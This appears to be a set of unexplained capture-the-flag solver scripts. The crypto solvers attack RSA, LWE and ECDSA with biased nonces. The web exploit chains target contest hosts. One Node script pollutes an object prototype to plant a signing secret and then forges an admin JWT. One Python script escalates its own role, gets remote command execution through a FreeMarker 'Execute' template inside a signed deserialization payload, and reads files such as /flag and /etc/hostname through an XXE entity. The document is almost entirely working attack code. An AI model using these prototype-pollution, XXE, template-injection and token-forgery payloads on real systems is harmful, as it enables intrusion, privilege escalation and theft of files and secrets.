a ctfer on the load

1
from math import isqrt
2

3
from Crypto.Util.number import long_to_bytes
4

5
n1 =
6
n2 =
7
n3 =
8
e = 65537
9
c1 =
10
c2 =
11
c3 =
12

13

14
def exact_square_root(value: int) -> int:
15
    root = isqrt(value)
16
    if root * root != value:
17
        raise ValueError("value is not a perfect square")
18
    return root
19

20
def recover_prime(a: int, b: int, c: int) -> int:
21
    return exact_square_root(a * b // c)
22

23
def decrypt_part(ciphertext: int, p: int, q: int) -> bytes:
24
    phi = (p - 1) * (q - 1)
25
    d = pow(e, -1, phi)
26
    return long_to_bytes(pow(ciphertext, d, p * q))
27

28
def main() -> None:
29
    p = recover_prime(n1, n3, n2)
30
    q = recover_prime(n1, n2, n3)
31
    r = recover_prime(n2, n3, n1)
32

33
    m1 = decrypt_part(c1, p, q)
34
    m2 = decrypt_part(c2, q, r)
35
    m3 = decrypt_part(c3, p, r)
36
    flag = m1 + m2 + m3
37

38
    print(f"p = {p}")
39
    print(f"q = {q}")
40
    print(f"r = {r}")
41
    print(f"flag = {flag.decode()}")
42

43
if __name__ == "__main__":
44
    main()

1
import json
2
import hashlib
3

4
from Crypto.Cipher import AES
5
from z3 import Int, Solver, sat
6

7

8
def pkcs7_unpad(data: bytes) -> bytes:
9
    pad_len = data[-1]
10
    if pad_len == 0 or pad_len > 16:
11
        raise ValueError("invalid padding length")
12
    if data[-pad_len:] != bytes([pad_len]) * pad_len:
13
        raise ValueError("invalid padding bytes")
14
    return data[:-pad_len]
15

16

17
def main() -> None:
18
    with open("data.txt", "r", encoding="utf-8") as f:
19
        data = json.load(f)
20

21
    n = data["n"]
22
    q = data["q"]
23
    A = data["A"]
24
    b = data["b"]
25

26
    s_vars = [Int(f"s_{i}") for i in range(n)]
27
    err_vars = [Int(f"e_{i}") for i in range(len(A))]
28
    wrap_vars = [Int(f"k_{i}") for i in range(len(A))]
29

30
    solver = Solver()
31

32
    for s_var in s_vars:
33
        solver.add(s_var >= 0, s_var <= 3)
34

35
    for row, target, err_var, wrap_var in zip(A, b, err_vars, wrap_vars):
36
        solver.add(err_var >= -1, err_var <= 1)
37
        solver.add(sum(coeff * var for coeff, var in zip(row, s_vars)) + err_var - target == q * wrap_var)
38

39
    if solver.check() != sat:
40
        raise RuntimeError("no solution found")
41

42
    model = solver.model()
43
    secret = [model.eval(var).as_long() for var in s_vars]
44
    errors = [model.eval(var).as_long() for var in err_vars]
45

46
    key = hashlib.sha256(str(secret).encode()).digest()[:16]
47
    iv = bytes.fromhex(data["iv"])
48
    enc = bytes.fromhex(data["enc"])
49
    plaintext = pkcs7_unpad(AES.new(key, AES.MODE_CBC, iv).decrypt(enc))
50

51
    print(f"secret = {secret}")
52
    print(f"errors = {errors}")
53
    print(f"flag = {plaintext.decode()}")
54

55
if __name__ == "__main__":
56
    main()

1
import json
2
import hashlib
3

4
from Crypto.Cipher import AES
5
from Crypto.Util.Padding import unpad
6
from Crypto.Util.number import long_to_bytes
7
from sage.all import QQ, ZZ, EllipticCurve, GF, matrix
8

9
class PartialInteger:
10
    def __init__(self):
11
        self.bit_length = 0
12
        self.unknowns = 0
13
        self._components = []
14

15
    def add_known(self, value, bit_length):
16
        self.bit_length += bit_length
17
        self._components.append((value, bit_length))
18
        return self
19

20
    def add_unknown(self, bit_length):
21
        self.bit_length += bit_length
22
        self.unknowns += 1
23
        self._components.append((None, bit_length))
24
        return self
25

26
    def get_known_msb(self):
27
        msb = 0
28
        msb_bit_length = 0
29
        for value, bit_length in reversed(self._components):
30
            if value is None:
31
                return msb, msb_bit_length
32
            msb = (msb << bit_length) + value
33
            msb_bit_length += bit_length
34
        return msb, msb_bit_length
35

36
    def get_unknown_lsb(self):
37
        lsb_bit_length = 0
38
        for value, bit_length in self._components:
39
            if value is not None:
40
                return lsb_bit_length
41
            lsb_bit_length += bit_length
42
        return lsb_bit_length
43

44
    def sub(self, unknowns):
45
        assert len(unknowns) == self.unknowns
46
        i = 0
47
        j = 0
48
        shift = 0
49
        for value, bit_length in self._components:
50
            if value is None:
51
                i += 2 ** shift * unknowns[j]
52
                j += 1
53
            else:
54
                i += value << shift
55
            shift += bit_length
56
        return i
57

58
    @staticmethod
59
    def from_msb(bit_length, msb, msb_bit_length):
60
        return PartialInteger().add_unknown(bit_length - msb_bit_length).add_known(msb, msb_bit_length)
61

62

63
def shortest_vectors(B):
64
    for row in B.LLL().rows():
65
        if not row.is_zero():
66
            yield row
67

68
def hnp_attack(a, b, modulus, bound):
69
    rows = len(a)
70
    cols = len(a[0])
71
    basis = matrix(QQ, rows + cols + 1, rows + cols + 1)
72

73
    for i in range(rows):
74
        for j in range(cols):
75
            basis[rows + j, i] = a[i][j]
76
        basis[i, i] = modulus
77
        basis[rows + cols, i] = b[i] - bound // 2
78

79
    for j in range(cols):
80
        basis[rows + j, rows + j] = bound / QQ(modulus)
81

82
    basis[rows + cols, rows + cols] = bound
83

84
    for v in shortest_vectors(basis):
85
        xs = [int(v[i] + bound // 2) for i in range(rows)]
86
        ys = [(int(v[rows + j] * modulus) // bound) % modulus for j in range(cols)]
87
        if all(y != 0 for y in ys) and v[rows + cols] == bound:
88
            yield xs, ys
89

90
def recover_private_key(order_n, hashes, rs, ss):
91
    partial_nonces = [PartialInteger.from_msb(256, 0, 8) for _ in hashes]
92
    a = []
93
    b = []
94
    bound = 0
95

96
    for h_i, r_i, s_i, k_i in zip(hashes, rs, ss, partial_nonces):
97
        msb, _ = k_i.get_known_msb()
98
        shift = 2 ** k_i.get_unknown_lsb()
99
        s_inv = pow(int(s_i), -1, int(order_n))
100
        a.append([ZZ((s_inv * r_i) % order_n)])
101
        b.append(ZZ((s_inv * h_i - shift * msb) % order_n))
102
        bound = max(bound, shift)
103

104
    for nonce_suffixes, secrets in hnp_attack(a, b, order_n, bound):
105
        private_key = ZZ(secrets[0])
106
        nonces = [ZZ(k_i.sub([suffix])) for k_i, suffix in zip(partial_nonces, nonce_suffixes)]
107
        return private_key, nonces
108

109
    raise ValueError("failed to recover private key")
110

111
def verify_public_key(data, private_key):
112
    p = ZZ(data["curve"]["p"])
113
    a = ZZ(data["curve"]["a"])
114
    b = ZZ(data["curve"]["b"])
115
    gx = ZZ(data["curve"]["Gx"])
116
    gy = ZZ(data["curve"]["Gy"])
117
    qx = ZZ(data["Q"][0])
118
    qy = ZZ(data["Q"][1])
119

120
    curve = EllipticCurve(GF(p), [a, b])
121
    G = curve(gx, gy)
122
    Q = ZZ(private_key) * G
123
    return ZZ(Q[0]) == qx and ZZ(Q[1]) == qy
124

125
def decrypt_flag(private_key, iv_hex, enc_hex):
126
    key = hashlib.sha256(long_to_bytes(int(private_key))).digest()[:16]
127
    iv = bytes.fromhex(iv_hex)
128
    enc = bytes.fromhex(enc_hex)
129
    cipher = AES.new(key, AES.MODE_CBC, iv)
130
    return unpad(cipher.decrypt(enc), 16)
131

132
def main():
133
    with open("data.json", "r") as f:
134
        data = json.load(f)
135

136
    n = ZZ(data["curve"]["n"])
137
    hashes = [ZZ(sig[0]) for sig in data["signatures"]]
138
    rs = [ZZ(sig[1]) for sig in data["signatures"]]
139
    ss = [ZZ(sig[2]) for sig in data["signatures"]]
140

141
    private_key, nonces = recover_private_key(n, hashes, rs, ss)
142
    if not verify_public_key(data, private_key):
143
        raise ValueError("recovered key does not match public key Q")
144

145
    flag = decrypt_flag(private_key, data["iv"], data["enc"]).decode()
146

147
    print(f"private key d = {private_key}")
148
    print(f"first nonce k0 = {nonces[0]}")
149
    print(flag)
150

151
if __name__ == "__main__":
152
    main()

1
{
2
  "notifications": {
3
    "digest": {
4
      "channels": {
5
        "constructor": {
6
          "prototype": {
7
            "pending": "ctf-admin-secret"
8
          }
9
        }
10
      }
11
    }
12
  }
13
}

1
signingState.active = rotation.pending;
2
signingState.version++;

1
{
2
  "id": "admin-id",
3
  "username": "admin",
4
  "role": "admin"
5
}

1
const https = require('https');
2
const querystring = require('querystring');
3
const jwt = require('jsonwebtoken');
4

5
const target = process.argv[2] || 'https://16776804.tcp-ctf2.dasctf.com:9999';
6
const secret = 'ctf-admin-secret';
7
const username = 'u' + Math.random().toString(16).slice(2, 10);
8
const password = 'pass1234';
9

10
function request(method, path, options = {}) {
11
  const url = new URL(path, target);
12
  const headers = Object.assign({}, options.headers || {});
13
  let body = options.body || '';
14

15
  if (body && !headers['Content-Length']) {
16
    headers['Content-Length'] = Buffer.byteLength(body);
17
  }
18

19
  return new Promise((resolve, reject) => {
20
    const req = https.request(
21
      {
22
        protocol: url.protocol,
23
        hostname: url.hostname,
24
        port: url.port,
25
        path: url.pathname + url.search,
26
        method,
27
        headers,
28
        rejectUnauthorized: false,
29
      },
30
      (res) => {
31
        const chunks = [];
32
        res.on('data', (chunk) => chunks.push(chunk));
33
        res.on('end', () => {
34
          resolve({
35
            statusCode: res.statusCode,
36
            headers: res.headers,
37
            body: Buffer.concat(chunks).toString(),
38
          });
39
        });
40
      }
41
    );
42

43
    req.on('error', reject);
44
    if (body) req.write(body);
45
    req.end();
46
  });
47
}
48

49
function getCookie(setCookieHeader) {
50
  if (!setCookieHeader || !setCookieHeader.length) {
51
    throw new Error('missing set-cookie header');
52
  }
53
  return setCookieHeader[0].split(';')[0];
54
}
55

56
async function main() {
57
  const registerBody = querystring.stringify({
58
    username,
59
    password,
60
    email: username + '@corp.local',
61
    department: 'Engineering',
62
  });
63
  const registerRes = await request('POST', '/register', {
64
    headers: {
65
      'Content-Type': 'application/x-www-form-urlencoded',
66
    },
67
    body: registerBody,
68
  });
69
  const userCookie = getCookie(registerRes.headers['set-cookie']);
70

71
  const pollutionPayload = JSON.stringify({
72
    notifications: {
73
      digest: {
74
        channels: {
75
          constructor: {
76
            prototype: {
77
              pending: secret,
78
            },
79
          },
80
        },
81
      },
82
    },
83
  });
84
  const settingsRes = await request('POST', '/api/settings', {
85
    headers: {
86
      'Content-Type': 'application/json',
87
      Cookie: userCookie,
88
    },
89
    body: pollutionPayload,
90
  });
91
  if (settingsRes.statusCode !== 200) {
92
    throw new Error('settings update failed: ' + settingsRes.statusCode + ' ' + settingsRes.body);
93
  }
94

95
  const healthRes = await request('GET', '/api/system/healthcheck');
96
  const health = JSON.parse(healthRes.body);
97
  if (!health.rotated) {
98
    throw new Error('key rotation did not happen: ' + healthRes.body);
99
  }
100

101
  const forgedToken = jwt.sign(
102
    {
103
      id: 'admin-id',
104
      username: 'admin',
105
      role: 'admin',
106
    },
107
    secret,
108
    {
109
      algorithm: 'HS256',
110
      expiresIn: '24h',
111
    }
112
  );
113
  const adminCookie = 'token=' + forgedToken;
114

115
  const adminRes = await request('GET', '/admin', {
116
    headers: {
117
      Cookie: adminCookie,
118
    },
119
  });
120
  const referenceMatch = adminRes.body.match(/Report Reference:\s*<strong>([0-9a-f]+)<\/strong>/);
121
  if (!referenceMatch) {
122
    throw new Error('could not extract reference from admin page');
123
  }
124
  const reference = referenceMatch[1];
125

126
  const reportRes = await request('POST', '/api/reports/execute', {
127
    headers: {
128
      'Content-Type': 'application/json',
129
      Cookie: adminCookie,
130
    },
131
    body: JSON.stringify({ reference }),
132
  });
133
  const report = JSON.parse(reportRes.body);
134

135
  console.log('target=' + target);
136
  console.log('user=' + username);
137
  console.log('reference=' + reference);
138
  console.log('flag=' + report.report);
139
}
140

141
main().catch((err) => {
142
  console.error(err.message);
143
  process.exit(1);
144
});

1
import base64
2
import hashlib
3
import hmac
4
import json
5
import random
6
import string
7
import subprocess
8
import urllib.error
9
import urllib.request
10

11

12
BASE_URL = "http://b8820b71.http-ctf2.dasctf.com:80"
13
SECRET = "TaxManager_Secret_K3y_2026_Un1que"
14
JAVA_CP = ".:extracted/BOOT-INF/classes:extracted/BOOT-INF/lib/*"
15

16

17
def build_opener():
18
    return urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
19

20

21
def random_suffix():
22
    return "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8))
23

24

25
def request_json(opener, method, path, data=None, headers=None):
26
    body = None
27
    merged_headers = {}
28
    if headers:
29
        merged_headers.update(headers)
30
    if data is not None:
31
        body = json.dumps(data).encode()
32
        merged_headers.setdefault("Content-Type", "application/json")
33
    req = urllib.request.Request(BASE_URL + path, data=body, headers=merged_headers, method=method)
34
    with opener.open(req) as resp:
35
        return json.loads(resp.read().decode())
36

37

38
def request_xml(opener, path, xml_text):
39
    req = urllib.request.Request(
40
        BASE_URL + path,
41
        data=xml_text.encode(),
42
        headers={"Content-Type": "application/xml"},
43
    )
44
    with opener.open(req) as resp:
45
        return json.loads(resp.read().decode())
46

47

48
def register_and_login(opener):
49
    suffix = random_suffix()
50
    username = f"u_{suffix}"
51
    password = f"p_{suffix}"
52
    taxpayer_id = f"TAX_{suffix}"
53

54
    register_resp = request_json(
55
        opener,
56
        "POST",
57
        "/api/register",
58
        {"username": username, "password": password, "taxpayerId": taxpayer_id},
59
    )
60
    login_resp = request_json(
61
        opener,
62
        "POST",
63
        "/api/login",
64
        {"username": username, "password": password},
65
    )
66
    if not register_resp.get("success") or not login_resp.get("success"):
67
        raise RuntimeError(f"register/login failed: {register_resp} / {login_resp}")
68
    return username, password
69

70

71
def xxe_read(opener, target_path):
72
    xml = f"""<?xml version="1.0"?>
73
<!DOCTYPE x [
74
<!ENTITY e SYSTEM "file://{target_path}">
75
]>
76
<history><taxpayerId>&e;</taxpayerId></history>"""
77
    resp = request_xml(opener, "/api/import/history", xml)
78
    prefix = "History imported successfully for taxpayer: "
79
    if resp.get("success") and resp.get("message", "").startswith(prefix):
80
        return resp["message"][len(prefix):]
81
    return json.dumps(resp, ensure_ascii=False)
82

83

84
def promote_to_reviewer(opener):
85
    resp = request_json(opener, "POST", "/api/profile/update", {"role": "reviewer"})
86
    if not resp.get("success"):
87
        raise RuntimeError(f"role update failed: {resp}")
88
    profile = request_json(opener, "GET", "/api/profile")
89
    if profile.get("role") != "reviewer":
90
        raise RuntimeError(f"unexpected role after update: {profile}")
91
    return profile
92

93

94
def apply_refund(opener, amount="8888.88", tax_year="2025", reason="review"):
95
    resp = request_json(
96
        opener,
97
        "POST",
98
        "/api/refund/apply",
99
        {"amount": amount, "taxYear": tax_year, "reason": reason},
100
    )
101
    if not resp.get("success"):
102
        raise RuntimeError(f"apply refund failed: {resp}")
103
    return int(resp["id"])
104

105

106
def build_payload(template):
107
    result = subprocess.run(
108
        ["java", "-cp", JAVA_CP, "PayloadBuilder", "payload", template],
109
        check=True,
110
        capture_output=True,
111
        text=True,
112
    )
113
    return result.stdout.strip()
114

115

116
def sign_attachment(attachment_data):
117
    return base64.b64encode(
118
        hmac.new(SECRET.encode(), attachment_data.encode(), hashlib.sha256).digest()
119
    ).decode()
120

121

122
def approve_with_payload(opener, refund_id, attachment_data):
123
    signature = sign_attachment(attachment_data)
124
    resp = request_json(
125
        opener,
126
        "POST",
127
        "/api/review",
128
        {"refundId": refund_id, "action": "approve", "attachmentData": attachment_data},
129
        {"X-Signature": signature},
130
    )
131
    if not resp.get("success"):
132
        raise RuntimeError(f"approve failed: {resp}")
133
    return resp
134

135

136
def trigger_export(opener, refund_id):
137
    prep = request_json(opener, "POST", "/api/export/prepare", {"refundId": refund_id})
138
    if not prep.get("success"):
139
        raise RuntimeError(f"prepare export failed: {prep}")
140
    gen = request_json(
141
        opener,
142
        "POST",
143
        "/api/export/generate",
144
        {"refundId": refund_id, "exportToken": prep["exportToken"]},
145
    )
146
    return prep, gen
147

148

149
def run_command_via_deser(opener, command):
150
    template = f'<#assign ex="freemarker.template.utility.Execute"?new()>${{ex("{command}")}}'
151
    payload = build_payload(template)
152
    refund_id = apply_refund(opener)
153
    approve_resp = approve_with_payload(opener, refund_id, payload)
154
    prep_resp, gen_resp = trigger_export(opener, refund_id)
155
    return {
156
        "refund_id": refund_id,
157
        "approve": approve_resp,
158
        "prepare": prep_resp,
159
        "generate": gen_resp,
160
    }
161

162

163
def main():
164
    opener = build_opener()
165
    username, password = register_and_login(opener)
166
    print(f"[*] creds: {username}:{password}")
167

168
    profile = promote_to_reviewer(opener)
169
    print(f"[*] promoted role: {profile['role']}")
170

171
    commands = [
172
        ("openssl base64 -A -in /etc/hostname -out /tmp/taxb64", "/tmp/taxb64", True),
173
        ("openssl base64 -A -in /flag -out /tmp/taxb64", "/tmp/taxb64", True),
174
        ("openssl base64 -A -in /flag.txt -out /tmp/taxb64", "/tmp/taxb64", True),
175
        ("openssl base64 -A -in /app/flag -out /tmp/taxb64", "/tmp/taxb64", True),
176
        ("openssl base64 -A -in /app/flag.txt -out /tmp/taxb64", "/tmp/taxb64", True),
177
        ("openssl base64 -A -in /tmp/flag -out /tmp/taxb64", "/tmp/taxb64", True),
178
        ("openssl base64 -A -in /tmp/flag.txt -out /tmp/taxb64", "/tmp/taxb64", True),
179
    ]
180

181
    for command, read_path, is_base64 in commands:
182
        print(f"[*] exec: {command}")
183
        run = run_command_via_deser(opener, command)
184
        print("[*] export result:", json.dumps(run["generate"], ensure_ascii=False))
185
        content = xxe_read(opener, read_path).strip()
186
        print(f"[*] read {read_path}: {content}")
187
        if is_base64 and content and not content.startswith("{"):
188
            try:
189
                decoded = base64.b64decode(content).decode(errors="replace")
190
                print(f"[*] decoded {read_path}: {decoded}")
191
            except Exception as exc:
192
                print(f"[*] decode failed: {exc}")
193

194

195
if __name__ == "__main__":
196
    main()